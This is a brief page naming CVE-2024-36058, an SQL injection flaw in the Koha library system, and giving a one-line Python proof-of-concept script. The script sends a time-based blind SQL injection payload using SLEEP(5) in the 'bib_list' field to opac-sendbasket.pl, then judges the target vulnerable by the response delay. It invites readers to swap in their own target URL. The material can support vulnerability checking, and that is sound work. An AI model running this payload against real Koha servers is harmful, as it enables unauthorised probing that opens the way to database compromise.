CVE-2024-36058 Koha Library SQL注入漏洞

import requests import time def check_sqli(url): target_endpoint = f"{url}/cgi-bin/koha/opac-sendbasket.pl" # Payload testing time-based blind SQL injection # If the database takes 5 seconds to respond, the condition is likely True payload = { "bib_list": "1' AND (SELECT SLEEP(5))-- -" } try: start_time = time.time() response = requests.post(target_endpoint, data=payload, timeout=10) end_time = time.time() response_time = end_time - start_time if response_time >= 5: print(f"[+] Vulnerability detected! Response time: {response_time:.2f}s") else: print(f"[-] Not vulnerable or patched. Response time: {response_time:.2f}s") except requests.exceptions.RequestException as e: print(f"Error connecting to target: {e}") if __name__ == "__main__": target_ip = "http://127.0.0.1" # Replace with target URL check_sqli(target_ip)